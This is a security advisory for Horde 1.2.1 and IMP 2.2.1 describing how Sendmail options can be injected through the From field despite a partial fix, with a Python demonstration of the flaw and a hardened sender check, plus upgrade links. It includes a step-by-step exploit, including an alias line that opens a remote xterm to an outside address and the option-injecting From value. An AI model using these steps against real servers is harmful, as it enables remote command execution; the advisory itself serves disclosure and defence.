COMMAND
IMP
SYSTEMS AFFECTED
Horde v1.2.1 & IMP v2.2.1
PROBLEM
Jens Steube found the following. The fix for the first reported
problem with the $from variable in the Horde library only escaped
shell metacharacters, which prevents direct command execution.
It is still possible to exploit the parsed $from line and execute
commands under the uid and gid of the web server, because the
address text is still handed to the MTA on its command line and
the MTA's own option switches are not filtered. This has been
tested under Debian 2.2 (potato).
Example exploit, using Horde and IMP with Sendmail (v8.11.0) as the MTA:
0. The goal is to send a mail to an address defined in an alias
file that the attacker hands to Sendmail himself (via an injected
AliasFile option, see step 8). This alias pipes to a command.
1. Log on to IMP and open a compose window.
2. Locally, open a text editor and write one line in MTA alias-file
format, then save the file locally. Example line:
evil@localhost: "|/usr/X11R6/bin/xterm -display 192.168.4.8:0.0"
3. Upload the locally stored file as an attachment.
4. Open the HTML source of the compose window and search for
'/tmp'.
5. You will find the path and filename under which the attachment
is stored on the web server. Copy it to the clipboard. Note that
the filename looks like /tmp/php??????.att
6. Just close the compose window!
7. Open a new compose window.
8. As the FROM line insert e.g. the following (including all quote
characters):
<"x@x -O QueueDirectory=/tmp -O AliasFile=(insert clipboard) -Fx">
9. As the TO line insert the user alias which you defined in the
uploaded attachment, e.g.:
evil@localhost
10. Leave all other fields blank and send the mail.
11. Exploited.
The above exploit works with Sendmail in most configurations, but
other MTAs could be exploited the same way. Note that merely
disabling the AliasFile option is not enough to prevent this attack,
because most MTAs provide other command-line switches that load
external configuration. The underlying defect is that user-supplied
address text reaches the MTA's argument vector at all; only strict
validation of the address (or not building a shell command line from
it) closes that hole.
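The following is an added example, not code from Horde or IMP, that
shows why the partial fix described above (escaping shell
metacharacters only) does not stop the procedure in steps 0 to 11,
and what a hardened sender check looks like. The set of escaped
characters, the sendmail path, the /tmp/php123456.att filename and
the sample addresses are all assumptions constructed for the
demonstration; the From value is the step 8 line as the address
parser would hand it on after stripping the <"..."> wrapping.

```python
import re
import shlex

# Characters escaped by PHP's escapeshellcmd() (assumed set for this
# demonstration; the partial fix applied this kind of escaping).
SHELL_META = set('#&;`|*?~<>^()[]{}$\\\n\'"')

# Constructed inputs.  MALICIOUS_FROM is the step 8 From line after the
# <"..."> wrapping is gone; the .att name stands in for the real one
# found in step 5.
MALICIOUS_FROM = "x@x -O QueueDirectory=/tmp -O AliasFile=/tmp/php123456.att -Fx"
CLASSIC_INJECTION_FROM = "x@x;/bin/id"
BENIGN_FROM = "alice@example.org"


def escape_shell_meta(s: str) -> str:
    """Backslash-escape shell metacharacters, as the partial fix did.
    Whitespace is deliberately left alone: that is the gap."""
    return "".join("\\" + c if c in SHELL_META else c for c in s)


def build_sendmail_cmd_vulnerable(from_addr: str) -> str:
    """The flawed pattern: the user-controlled sender is spliced into a
    shell command string after nothing more than metacharacter escaping."""
    return "/usr/sbin/sendmail -t -f" + escape_shell_meta(from_addr)


def argv_seen_by_sendmail(cmd: str) -> list:
    """Word-split the command string the way /bin/sh would before exec."""
    return shlex.split(cmd)


def injected_mta_switches(argv: list) -> list:
    """Arguments after the program name that look like options and are
    not the -t / -f the application intended to pass."""
    return [a for a in argv[1:]
            if a.startswith("-") and not a.startswith(("-t", "-f"))]


# Hardened form: a strict addr-spec whitelist and no shell at all.
ADDR_SPEC = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def is_safe_envelope_sender(addr: str) -> bool:
    """Accept only a plain local@domain.  Whitespace, quotes and other
    decoration fail the regex; a leading '-' is refused separately so the
    value can never be parsed as an MTA option."""
    return bool(ADDR_SPEC.match(addr)) and not addr.startswith("-")


def build_sendmail_argv_hardened(from_addr: str) -> list:
    """Return an argv list for a shell-free (execve-style) invocation, or
    raise ValueError.  The sender stays one argv element, so even a
    validator bypass could not append further switches."""
    if not is_safe_envelope_sender(from_addr):
        raise ValueError("refusing to pass unvalidated sender to the MTA")
    return ["/usr/sbin/sendmail", "-t", "-f" + from_addr]


if __name__ == "__main__":
    for label, addr in (("classic ';' injection", CLASSIC_INJECTION_FROM),
                        ("MTA option injection", MALICIOUS_FROM)):
        argv = argv_seen_by_sendmail(build_sendmail_cmd_vulnerable(addr))
        print(f"{label}: argv={argv} injected={injected_mta_switches(argv)}")
    print("hardened:", build_sendmail_argv_hardened(BENIGN_FROM))
```

Run stand-alone, the first case shows the escaping doing its job
(";/bin/id" stays glued to the -f argument), while the second shows
the unescaped spaces turning one sender into six extra argv words,
three of them Sendmail options. The hardened builder rejects both
hostile values and still accepts an ordinary address.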
SOLUTION
There is an update available which should be a more complete fix.
The Horde team announced the availability of IMP 2.2.2. This
version is "part 2" of the fix for a security vulnerability present
in 2.2.0 (and earlier "pre" releases) that was only partially fixed
in 2.2.1. Users of IMP 2.2 on production systems are STRONGLY
ENCOURAGED to upgrade.
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.1/noarch/horde-shm-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.1/noarch/imp-2.2.2-1cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-mysql-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-pgsql-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-xml-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/apache-1.3.12-8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/apache-devel-1.3.12-8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/apache-doc-1.3.12-8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.2/noarch/horde-shm-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.2/noarch/imp-2.2.2-1cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-mysql-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-pgsql-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-xml-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/apache-1.3.12-8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/apache-devel-1.3.12-8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/apache-doc-1.3.12-8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.0/noarch/horde-shm-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.0/noarch/imp-2.2.2-1cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-mysql-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-pgsql-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-xml-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-mysql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-pgsql-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.1/noarch/horde-shm-1.2.2-2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.1/noarch/imp-2.2.2-1cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-doc-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-gd-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-imap-3.0.16-6cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-ldap-3.0.16-6cl.i386.rpm